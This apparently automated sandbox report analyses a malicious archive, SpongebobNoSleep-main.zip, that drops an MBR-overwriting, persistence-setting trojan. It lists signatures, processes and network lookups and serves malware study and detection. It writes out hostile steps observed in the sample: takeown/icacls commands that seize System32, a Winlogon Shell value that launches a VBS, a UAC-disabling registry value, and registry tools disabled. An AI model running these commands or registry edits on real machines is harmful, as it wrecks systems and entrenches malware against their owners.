Malware Analysis Report

2024-11-16 12:23

Sample ID 240318-fg4qcshc9x
Target SpongebobNoSleep-main.zip
SHA256 886d6753cbc06147302e746e9f34c5daab793078cd868cc16891143eeb30af2a
Tags
discovery exploit bootkit evasion persistence ransomware trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

886d6753cbc06147302e746e9f34c5daab793078cd868cc16891143eeb30af2a

Threat Level: Known bad

The file SpongebobNoSleep-main.zip was found to be: Known bad.

Malicious Activity Summary

discovery exploit bootkit evasion persistence ransomware trojan upx

Modifies WinLogon for persistence

UAC bypass

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Possible privilege escalation attempt

Modifies file permissions

UPX packed file

Checks computer location settings

Executes dropped EXE

Adds Run key to start application

Writes to the Master Boot Record (MBR)

Drops file in System32 directory

Sets desktop wallpaper using registry

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Modifies registry key

Modifies Control Panel

Suspicious use of SetWindowsHookEx

Runs net.exe

Modifies Internet Explorer settings

System policy modification

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-18 04:51

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

118s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter.exe"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\LogonUI.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter.exe

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant "Admin:F"

Network

N/A

Files

memory/2204-0-0x0000000000FA0000-0x0000000000FAE000-memory.dmp

memory/2204-1-0x000007FEF59A0000-0x000007FEF638C000-memory.dmp

memory/2204-2-0x000000001A7B0000-0x000000001A830000-memory.dmp

memory/2204-4-0x000007FEF59A0000-0x000007FEF638C000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

95s

Max time network

175s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter.exe"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter.exe

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1340 --field-trial-handle=2236,i,5367110156796017614,12594004256180761011,262144 --variations-seed-version /prefetch:8

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant "Admin:F"

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp

Files

memory/4676-0-0x0000000000850000-0x000000000085E000-memory.dmp

memory/4676-1-0x00007FFBEDF90000-0x00007FFBEEA51000-memory.dmp

memory/4676-2-0x000000001B5A0000-0x000000001B5B0000-memory.dmp

memory/4676-3-0x00007FFBEDF90000-0x00007FFBEEA51000-memory.dmp

memory/4676-4-0x000000001B5A0000-0x000000001B5B0000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

140s

Max time network

154s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Form1.js

Signatures

N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Form1.js

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 104.241.123.92.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 174.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 32.134.221.88.in-addr.arpa udp

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

118s

Max time network

124s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Properties\Resources.Designer.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Properties\Resources.Designer.vbs"

Network

N/A

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20231215-en

Max time kernel

112s

Max time network

145s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Properties\Resources.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Properties\Resources.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 178.223.142.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

150s

Max time network

176s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\TempPE\Properties.Resources.Designer.cs.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\TempPE\Properties.Resources.Designer.cs.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4048 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
GB 142.250.200.42:443 tcp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20231215-en

Max time kernel

150s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\windows\\winbase_base_procid_none\\secureloc0x65\\WinRapistI386.vbs\"" C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A

Disables Task Manager via registry modification

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\49CA.tmp\mbr.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" C:\Windows\system32\reg.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe C:\Windows\system32\cmd.exe N/A
File created \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav C:\Windows\system32\cmd.exe N/A
File opened for modification \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav C:\Windows\system32\cmd.exe N/A
File created \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Cursors\Hand = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\49CA.tmp\MainWindow.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4516 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe C:\Windows\system32\wscript.exe
PID 4516 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe C:\Windows\system32\wscript.exe
PID 4640 wrote to memory of 2028 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\49CA.tmp\mbr.exe
PID 4640 wrote to memory of 2028 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\49CA.tmp\mbr.exe
PID 4640 wrote to memory of 2028 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\49CA.tmp\mbr.exe
PID 4640 wrote to memory of 4732 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 4732 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 4732 wrote to memory of 5116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4732 wrote to memory of 5116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4732 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4820 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4820 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
